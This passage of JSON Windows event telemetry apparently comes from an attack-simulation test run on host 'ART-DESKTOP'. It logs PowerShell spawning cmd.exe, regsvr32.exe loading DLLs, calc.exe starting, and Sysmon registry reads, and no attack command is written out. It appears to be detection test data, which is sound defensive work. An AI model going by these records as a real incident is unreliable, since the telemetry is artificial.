"C:\\Windows\\System32\\ntdll.dll", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243390000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "process", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573243390000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243390000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 
6748, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573243530000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243390000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - 
"event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts", - "registry_value": "ApplicationAssociationToasts", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - "image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\SysWOW64\\apphelp.dll", - "pid": 1284, - "process_name": 
"regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\SysWOW64\\AcLayers.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - 
"unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\SysWOW64\\shell32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { 
- "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\SysWOW64\\cfgmgr32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\SysWOW64\\SHCore.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": 
"sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\SysWOW64\\windows.storage.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": 
"C:\\Windows\\SysWOW64\\profapi.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\SysWOW64\\powrprof.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\SysWOW64\\fltLib.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\setupapi.dll", - "pid": 1284, - "process_name": 
"regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\SysWOW64\\mpr.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\SysWOW64\\winspool.drv", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\SysWOW64\\propsys.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\SysWOW64\\IPHLPAPI.DLL", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 
131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcrypt.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc_os.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243860000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573244020000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - 
"event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "subtype": "terminate", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "process", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
